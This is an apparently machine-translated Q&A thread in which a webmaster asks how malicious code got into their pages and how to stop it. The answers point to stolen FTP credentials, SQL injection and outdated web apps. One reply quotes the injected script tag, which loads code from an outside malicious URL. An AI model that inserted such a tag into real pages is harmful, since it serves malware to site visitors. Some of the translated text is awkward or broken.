代码之家  ›  专栏  ›  技术社区  ›  rhodesjason

我发现我的HTML页面标题中包含了流氓代码——它是如何出现的,我该如何阻止它?

  •  0
  • rhodesjason  · 技术社区  · 16 年前

    我的主要弱点是保护我的网站——我知道,这是一个糟糕的弱点。

    http://mylocksmithusa.com/sitebuilder/acura2002.php --但我找不到我的档案。他们是如何到达那里的,我怎样才能找到他们,我怎样才能移除他们,我怎样才能阻止他们再次发生?

    类似地,我的另一个网站一直在重写index.php文件,主要是删除一些代码,然后是一堆代码 <iframe>jareqjj93u8q2u35w</iframe>

    我的FTP密码非常安全--我是否应该更改它们并希望它停止?还是有更多我只是不明白的关于锁定我的网站以防止这种危险的滥用?

    4 回复  |  直到 16 年前
        1
  •  0
  •   Exiled_Gundam    16 年前

    我的网站也受到了同样的攻击 <script src=http://mylocksmithusa.com/sitebuilder/acura2002.php></script> . 在我检查它之后,显然几乎我所有的.js文件都附加了 document.write([the script above]) <body> 标记(然后删除了文件中的最后几行),并且在我的站点中的几个.php文件的开头添加了eval([超长代码])。

    清理完文件后,昨天我更改了ftp密码,今天网站不再被黑客攻击(以前,每隔几个小时文件就会被更改一次)。所以我怀疑有蠕虫或者别的什么东西已经访问了你的ftp。你可以做的是更改ftp密码,让你的网站暂时离线,直到你清理了文件。

        2
  •  2
  •   erlando    16 年前

    看起来您是SQL注入攻击的受害者,或者信任来自查询字符串的未初始化输入。

        3
  •  1
  •   bobince    16 年前

    在更改密码之前,您用于连接到它的恶意软件的任何客户端(最好改为SFTP;2009年,任何人都不应该继续使用FTP。)

    不要因为你运行的是杀毒软件就认为你的机器没有被感染。今天的AVs是可悲的,绝望的背后的恶意软件作家。接受多种意见,如果AV发现任何问题,不要相信它能解决问题,因为它很可能会失败,可能会留下感染。而是重新安装操作系统。

        4
  •  1
  •   Collin    16 年前

    你问我们有人是如何打开你的网站的,唯一诚实的回答是“我们不知道”。

    很可能 您是否安装了wordpress或某些Web应用程序的已知易受攻击的旧版本,并且有一个漫游蠕虫发现并利用了它。